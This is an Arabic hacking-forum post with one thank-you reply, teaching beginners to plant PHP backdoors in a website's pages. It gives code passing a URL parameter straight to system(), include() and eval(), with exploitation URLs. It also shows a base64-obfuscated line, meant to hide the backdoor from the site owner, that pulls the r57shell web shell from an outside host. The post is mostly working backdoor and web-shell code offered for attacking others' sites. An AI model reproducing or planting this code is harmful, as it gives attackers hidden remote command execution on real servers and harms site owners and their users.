المدير Admin
عدد المساهمات : 419 نقاط : 1236 السٌّمعَة : 0 تاريخ التسجيل : 16/10/2010 العمر : 34 الموقع : المخاء
| موضوع: تــلــغــيــم الــصــفــحــات للــمــوقــع الأحد ديسمبر 12, 2010 5:51 pm | |
| بـسـم الله الــرحــمــن الــرحــيـم السلام عليكم ورحمة الله وبركاته كيفكم يا ابطال القوات الهكرز يمكن الدرس عليكم قديم ولكن قلت اطرح لي المبتدئين لى تعلم اكثر وهو درس كيفية تلغيم الصفحات للموقع ادخل في الدرس لي كي لا تأخر الوقت عليكم طبعا الدوال المهمه التي يستفاد منها هيinclude + system + eval
استـــخـــدام system
كود PHP: if(empty($_GET['tryag'])){ } else { $m=$_GET['tryag']; echo system($m) ; } ?> الاستغلال للكود
كود PHP: ttp://www.web.com/filname.php?tryag=[cmd] cmd = اوامر لينكساستخدام include كود PHP: if(empty($_GET['tryag'])){ } else { $m=$_GET['tryag']; print include($m) ; } ?> كود PHP: http://www.web.com/filname.php?tryag=[shill.txt] cmd = اوامر لينكس استخدام eval طبعا ايفل لها طريقتين وهي تمرير الكود عن طريق تشفير ASCII-table وطريقه الاستخدام كود PHP: if(empty($_GET['tryag'])){ } else { $m=$_GET['tryag']; eval(stripslashes($m)); } ?> الاستغلال للكود كود PHP: http://www.web.com/filname.php?tryag=[code] code = هو كود php مشفر عن طريق ASCII-table وهذا مثال لفهم الفكره بشكل اوضح [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]الطريقه الثانيه وهي استخدام ايفل بدون تشفير كود PHP: if(empty($_GET['tryag'])){ } else { $m=$_GET['tryag']; @eval(stripslashes($m)); } ?>
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] كود PHP: http://www.web.com/filname.php?tryag=[code]
code = هو كود php ومثال اخر [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] طبعا احيانا نضطر للتشفير الكود بحيث نصعب المسأله امام صاحب الموقع وطرق التشفير كثره وسأستخدم تشفير Base64 كود PHP: if(empty($_GET['tryag'])){ } else {
$m=$_GET['tryag']; eval(base64_decode('aW5jbHVkZSgiaHR0cDovL3JzdC52b2lkLnJ1L2Rvd25sb2FkL3I1N3NoZWxsLnR4dD8iKTs=')); } ?> الاستغلال للكود كود PHP: http://www.web.com/filname.php?tryag=[cmd] cmd = اي قيمه شرح الكود هو نفس استغلال ايفل ولكن مررنا الكود php بتشفير Base64 التشفير كود PHP: aW5jbHVkZSgiaHR0cDovL3JzdC52b2lkLnJ1L2Rvd25sb2FkL3I1N3NoZWxsLnR4dD8iKTs= وفـكه هو
كود PHP: include("http://rst.void.ru/download/r57shell.txt?"); وعند تمرير اي قيمه للمتغير tryag سيتم تنفيذ الكود مثال [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] وانشالله يكون درس مفيد
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] | |
|
????? زائر
| موضوع: معلوة سهلة ومفيدة الأربعاء ديسمبر 15, 2010 11:23 am | |
| شكراً على هذ الموضوع موضوع جميل ومفيد |
|